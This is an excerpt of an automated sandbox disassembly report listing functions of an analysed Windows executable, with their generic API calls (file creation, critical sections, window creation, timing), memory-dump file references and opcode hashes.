                                                                                                                                                                                                                                                                                                        • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                                                                                                                        Function 004CF830 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-4282027825
                                                                                                                                                                                                                                                                                                        • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                        • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                                                                                                                        Function 004DD6F0 Relevance: 8.8, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,7772E820,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                                                                                                                        Function 004D8640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$Create
                                                                                                                                                                                                                                                                                                        • String ID: Dummy$STATIC
                                                                                                                                                                                                                                                                                                        • API String ID: 1733017098-132613206
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                                                                                                                        Function 004F5A70 Relevance: 7.6, APIs: 6, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                                                                                                                        Function 004F26C0 Relevance: 7.6, APIs: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1404962471-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                                                                                                                        Function 005293B0 Relevance: 7.6, APIs: 5, Instructions: 77sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1430435781-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                        • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                                                                                                                        Function 004F5CB0 Relevance: 7.6, APIs: 6, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
